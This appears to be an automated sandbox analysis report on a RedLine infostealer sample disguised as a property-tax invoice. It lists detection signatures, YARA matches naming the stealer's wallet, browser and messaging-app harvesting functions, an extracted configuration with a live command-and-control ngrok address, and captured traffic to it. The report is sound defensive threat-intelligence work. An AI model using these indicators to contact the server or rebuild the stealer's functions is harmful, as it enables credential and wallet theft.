Edit tour

Windows Analysis Report
P90GT_Invoice_Related_Property_Tax_P800.exe

Overview

General Information

Sample Name:	P90GT_Invoice_Related_Property_Tax_P800.exe
Analysis ID:	635333
MD5:	6ffb271dac5aea05d5a8feb1344ac144
SHA1:	20f253980f2d959583346e35b3d36e4aa23e5e70
SHA256:	7107046a7edefa979e9d52e5af41029cc7c3cad45e78ab16ecbbfbb2b6349f18
Tags:	exe
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Initial sample is a PE file and has a suspicious name

Tries to steal Crypto Currency Wallets

Connects to many ports of the same IP (likely port scanning)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Injects a PE file into a foreign processes

Yara detected Generic Downloader

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

PE file has nameless sections

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Executable has a suspicious name (potential lure to open the executable)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Tries to harvest and steal browser information (history, passwords, etc)

PE file contains section with special chars

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Yara detected Credential Stealer

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Is looking for software installed on the system

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

P90GT_Invoice_Related_Property_Tax_P800.exe (PID: 6532 cmdline: "C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe" MD5: 6FFB271DAC5AEA05D5A8FEB1344AC144)

P90GT_Invoice_Related_Property_Tax_P800.exe (PID: 6608 cmdline: C:\Users\user\Desktop\P90GT_Invoice_Related_Property_Tax_P800.exe MD5: 6FFB271DAC5AEA05D5A8FEB1344AC144)

conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["2.tcp.eu.ngrok.io:17685"], "Bot Id": "cheat"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
P90GT_Invoice_Related_Property_Tax_P800.exe	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x3668b:$name: ConfuserEx 0x2feb1:$compile: AssemblyTitle

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.450292993.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000002.450292993.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.549326189.0000000003839000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.549326189.0000000003839000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.454537035.0000000002E3F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000000.276963051.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000000.276963051.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000000.277869391.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000000.277869391.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000000.275805677.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000000.275805677.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000000.277406747.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000000.277406747.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.272367102.0000000000ADB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000003.272367102.0000000000ADB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: P90GT_Invoice_Related_Property_Tax_P800.exe PID: 6532	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: P90GT_Invoice_Related_Property_Tax_P800.exe PID: 6532	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: P90GT_Invoice_Related_Property_Tax_P800.exe PID: 6608	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: P90GT_Invoice_Related_Property_Tax_P800.exe PID: 6608	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.12.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.12.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.12.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.12.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165f2:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165d3:$v2_6: GetUpdates
0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.450000.0.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x3668b:$name: ConfuserEx 0x2feb1:$compile: AssemblyTitle
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.11.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x3668b:$name: ConfuserEx 0x2feb1:$compile: AssemblyTitle
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.2.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x3668b:$name: ConfuserEx 0x2feb1:$compile: AssemblyTitle
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.13.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x3668b:$name: ConfuserEx 0x2feb1:$compile: AssemblyTitle
1.2.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.1.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x3668b:$name: ConfuserEx 0x2feb1:$compile: AssemblyTitle
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.7.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x3668b:$name: ConfuserEx 0x2feb1:$compile: AssemblyTitle
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.0.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x3668b:$name: ConfuserEx 0x2feb1:$compile: AssemblyTitle
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.10.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.10.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.10.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165f2:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165d3:$v2_6: GetUpdates
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.9.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x3668b:$name: ConfuserEx 0x2feb1:$compile: AssemblyTitle
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.3.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x3668b:$name: ConfuserEx 0x2feb1:$compile: AssemblyTitle
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.4.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165f2:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165d3:$v2_6: GetUpdates
0.0.P90GT_Invoice_Related_Property_Tax_P800.exe.450000.0.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x3668b:$name: ConfuserEx 0x2feb1:$compile: AssemblyTitle
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.8.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.8.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.8.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165f2:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165d3:$v2_6: GetUpdates
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.1.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x3668b:$name: ConfuserEx 0x2feb1:$compile: AssemblyTitle
0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147f2:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147d3:$v2_6: GetUpdates
1.2.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.2.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165f2:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165d3:$v2_6: GetUpdates
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.6.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.6.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.6.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165f2:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165d3:$v2_6: GetUpdates
1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.5.unpack	SUSP_NET_NAME_ConfuserEx	Detects ConfuserEx packed file	Arnim Rupp	0x3668b:$name: ConfuserEx 0x2feb1:$compile: AssemblyTitle
0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x280aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b761:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20d50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ac99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x282ab:$v2_2: get_ScanVPN 0x2834e:$v2_2: get_ScanFTP
Click to see the 38 entries

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 2.tcp.eu.ngrok.io:17685Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: 2.tcp.eu.ngrok.io

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: P90GT_Invoice_Related_Property_Tax_P800.exe

PE file has nameless sections

Source: P90GT_Invoice_Related_Property_Tax_P800.exe

Static PE information: section name:

Executable has a suspicious name (potential lure to open the executable)

Source: P90GT_Invoice_Related_Property_Tax_P800.exe

Static file information: Suspicious name

PE file contains section with special chars

Source: P90GT_Invoice_Related_Property_Tax_P800.exe

Static PE information: section name: T,y"J8

Source: P90GT_Invoice_Related_Property_Tax_P800.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: P90GT_Invoice_Related_Property_Tax_P800.exe, type: SAMPLE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.11.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.2.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.13.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 1.2.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.7.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.3.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.0.P90GT_Invoice_Related_Property_Tax_P800.exe.450000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.0.P90GT_Invoice_Related_Property_Tax_P800.exe.b00000.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 0.2.P90GT_Invoice_Related_Property_Tax_P800.exe.3851338.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.P90GT_Invoice_Related_Property_Tax_P800.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
